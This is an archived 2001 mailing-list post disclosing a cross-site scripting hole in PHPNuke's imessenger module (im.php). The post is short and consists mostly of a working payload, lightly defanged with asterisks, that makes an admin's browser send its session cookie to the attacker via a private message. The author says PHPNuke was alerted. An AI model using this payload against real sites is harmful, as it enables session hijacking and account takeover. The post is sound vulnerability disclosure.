('binary' encoding is not supported, stored as-is) There is a big hole in imessenger (im.php). He accept javascript... if I send <*s*cript>window.location.href='http://www. [SERVER].com/im.php?username_to= [MY_NICK] &subject='+ document.cookie +'&message=message&action=send' ;</script> (without '*') to the admin, he send his cookie. PHPNuke has been alerted. There's a tut (french) here : http://balteam.multimania.com/Tuts/imhole.txt frog-m@n
This archive was generated by hypermail 2b30 : Sat Dec 15 2001 - 08:54:36 PST